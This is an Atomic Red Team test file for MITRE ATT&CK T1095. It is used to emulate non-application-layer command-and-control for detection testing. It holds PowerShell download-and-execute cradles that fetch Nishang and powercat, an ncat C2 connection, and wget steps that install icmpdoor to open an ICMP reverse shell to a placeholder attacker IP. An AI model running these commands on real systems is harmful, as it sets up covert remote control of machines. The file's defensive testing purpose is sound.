atomic-red-team/atomics/T1095/T1095.md

# T1095 - Non-Application Layer Protocol
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1095)
<blockquote>

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

In ESXi environments, adversaries may leverage the Virtual Machine Communication Interface (VMCI) for communication between guest virtual machines and the ESXi host. This traffic is similar to client-server communications on traditional network sockets but is localized to the physical machine running the ESXi host, meaning it does not traverse external networks (routers, switches). This results in communications that are invisible to external monitoring and standard networking tools like tcpdump, netstat, nmap, and Wireshark. By adding a VMCI backdoor to a compromised ESXi host, adversaries may persistently regain access from any guest VM to the compromised ESXi host’s backdoor, regardless of network segmentation or firewall rules in place.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - ICMP C2](#atomic-test-1---icmp-c2)

- [Atomic Test #2 - Netcat C2](#atomic-test-2---netcat-c2)

- [Atomic Test #3 - Powercat C2](#atomic-test-3---powercat-c2)

- [Atomic Test #4 - Linux ICMP Reverse Shell using icmp-cnc](#atomic-test-4---linux-icmp-reverse-shell-using-icmp-cnc)


<br/>

## Atomic Test #1 - ICMP C2
This will attempt to  start C2 Session Using ICMP. For information on how to set up the listener
refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/

**Supported Platforms:** Windows


**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | The IP address of the listening server | string | 127.0.0.1|


#### Attack Commands: Run with `powershell`! 


```powershell
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}
```






<br/>
<br/>

## Atomic Test #2 - Netcat C2
Start C2 Session Using Ncat
To start the listener on a Linux device, type the following: 
nc -l -p <port>

**Supported Platforms:** Windows


**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_port | The port for the C2 connection | integer | 80|
| ncat_exe | The location of ncat.exe | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1095&#92;nmap-7.80&#92;ncat.exe|
| ncat_path | The folder path of ncat.exe | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1095|
| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1|


#### Attack Commands: Run with `powershell`! 


```powershell
cmd /c "#{ncat_exe}" #{server_ip} #{server_port}
```




#### Dependencies:  Run with `powershell`!
##### Description: ncat.exe must be available at specified location (#{ncat_exe})
##### Check Prereq Commands:
```powershell
if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path "#{ncat_path}" | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest  "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
  Expand-Archive $zippath $parentpath -Force
  $unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
  Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}
```




<br/>
<br/>

## Atomic Test #3 - Powercat C2
Start C2 Session Using Powercat
To start the listener on a Linux device, type the following: 
nc -l -p <port>

**Supported Platforms:** Windows


**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1|
| server_port | The port for the C2 connection | integer | 80|


#### Attack Commands: Run with `powershell`! 


```powershell
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}
```






<br/>
<br/>

## Atomic Test #4 - Linux ICMP Reverse Shell using icmp-cnc
ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
This method allows attackers to communicate and control compromised devices while remaining undetected.

For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)

**Important Notes:**
- Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
- Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
- Root access is required.

**Supported Platforms:** Linux


**auto_generated_guid:** 8e139e1f-1f3a-4be7-901d-afae9738c064





#### Run it with these steps! 
1. Run the following command on both the attacker and victim machines to download the required binaries.

    mkdir -p /tmp/icmpdoor && wget -P /tmp/icmpdoor https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmp-cnc https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmpdoor && chmod +x /tmp/icmpdoor/icmp-cnc /tmp/icmpdoor/icmpdoor && echo 'export PATH=$PATH:/tmp/icmpdoor' >> ~/.bashrc && source ~/.bashrc

2. Start the C2 server on the attacker system to listen for incoming connections.

    icmp-cnc --interface <Network Interface> --destination_ip <VICTIM-IP>

3. Run the client on the victim machine.

    icmpdoor --interface <Network Interface> --destination_ip <ATTACKER-IP>
  
4. Cleanup Command: Remove the icmpdoor directory.

    rm -rf /tmp/icmpdoor







<br/>